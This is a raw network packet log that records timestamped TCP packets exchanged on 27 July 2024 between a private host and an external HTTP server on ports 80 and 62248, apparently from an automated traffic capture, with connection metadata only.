Jul 27, 2024 07:43:57.406023026 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.406055927 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.406080008 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.406109095 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.406157017 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.406158924 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.406210899 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.406244040 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.406275034 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.406281948 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.406332016 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.406337023 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.406454086 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.406502962 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.406503916 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.406539917 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.406589985 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.406593084 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.406625032 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.406660080 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.406676054 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.406693935 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.406729937 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.406744003 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.406783104 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.406816959 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.406822920 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.406852961 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.406884909 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.406896114 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.406920910 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.407025099 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.407032013 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.407085896 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.407119036 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.407128096 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.407157898 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.407190084 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.407198906 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.407227039 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.407258987 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.407269955 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.407293081 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.407325029 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.407335997 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.407358885 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.407392025 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.407399893 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.407424927 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.407458067 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.407489061 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.407491922 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.407552958 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.407560110 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.407594919 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.407625914 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.407635927 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.407660007 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.407694101 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.407701015 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.407727003 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.407763958 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.407769918 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.407799006 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.407830954 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.407857895 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.407865047 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.407900095 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.407907009 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.407934904 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.407967091 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.407979965 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.408004045 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.408035994 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.408046007 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.408071041 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.408102989 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.408107996 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.408139944 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.408171892 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.408179998 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.408207893 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.408241987 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.408251047 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.408276081 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.408308983 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.408341885 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.408343077 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.408375978 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.408381939 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.408409119 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.408442020 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.408448935 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.408478022 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.408533096 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.408538103 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.408567905 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.408601046 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.408613920 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.408636093 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.408670902 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.408678055 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.459079027 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.490945101 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.491090059 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.491144896 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.491142988 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.491199970 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.491234064 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.491267920 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.491266966 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.491305113 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.491331100 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.491341114 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.491375923 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.491389990 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.491410971 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.491442919 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.491456985 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.491476059 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.491509914 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.491518021 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.491544008 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.491578102 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.491591930 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.491610050 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.491645098 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.491677046 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.491683960 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.491719007 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.491728067 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.491751909 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.491786003 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.491803885 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.491822004 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.491858006 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.491873026 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.491888046 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.491920948 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.491935968 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.491955996 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.491987944 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.492003918 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.492022038 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.492058992 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.492074013 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.492295027 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.492342949 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.492400885 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.492439985 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.492511034 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.492518902 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.492563963 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.492609978 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.492616892 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.492651939 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.492692947 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.492703915 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.492738008 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.492790937 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.492806911 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.492846012 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.492878914 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.492888927 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.492914915 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.492948055 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.492953062 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.493000984 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.493041992 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.493065119 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.493097067 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.493130922 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.493136883 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.493165016 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.493197918 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.493215084 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.493235111 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.493268013 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.493294001 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.493304014 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.493340015 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.493357897 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.493391037 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.493423939 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.493436098 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.493458033 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.493510962 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.493510962 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.493544102 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.493582010 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.493593931 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.493633986 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.493668079 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.493693113 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.493700981 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.493740082 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.493741035 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.493796110 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.493830919 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.493843079 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.493865967 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.493900061 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.493911982 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.493935108 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.493968010 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.493976116 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.494002104 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.494035959 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.494048119 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.494090080 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.494126081 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.494138956 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.494178057 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.494211912 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.494225979 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.494247913 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.494281054 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.494286060 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.494311094 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.494353056 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.494364023 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.494400024 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.494431973 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.494446993 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.494467020 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.494499922 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.494513035 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.494534016 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.494565010 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.494580030 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.494623899 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.494657040 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.494671106 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.494690895 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.494724035 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.494738102 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.494781971 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.494816065 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.494832039 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.494849920 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.494884968 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.494900942 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.494936943 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.494971037 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.494985104 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.495004892 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.495033979 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.495050907 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.495069027 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.495102882 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.495110989 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.495136976 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.495170116 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.495182991 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.495203018 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.495235920 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.495250940 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.495271921 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.495307922 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.495315075 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.495341063 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.495373964 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.495388031 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.495409012 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.495441914 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.495455027 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.495476007 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.495511055 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.495523930 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.537161112 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.581124067 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.581170082 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.581207037 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.581223011 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.581242085 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.581278086 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.581294060 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.581311941 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.581346989 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.581352949 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.581381083 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.581413984 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.581429005 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.581446886 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.581482887 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.581490040 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.582247972 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.582294941 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.582325935 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.582357883 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.582406998 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.582410097 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.582443953 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.582479000 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.582489014 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.582514048 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.582554102 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.582565069 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.582600117 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.582632065 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.582640886 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.582665920 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.582712889 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.582716942 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.582751036 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.582787991 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.582794905 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.582822084 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.582859039 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.582871914 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.582905054 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.582942009 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.582945108 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.582977057 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.583009005 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.583030939 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.583041906 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.583075047 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.583084106 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.583127022 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.583162069 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.583168983 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.583194971 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.583228111 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.583231926 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.583265066 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.583300114 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.583307981 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.583334923 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.583389997 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.583456993 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.583520889 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.583553076 CEST	80	62248	64.190.113.113	192.168.2.4
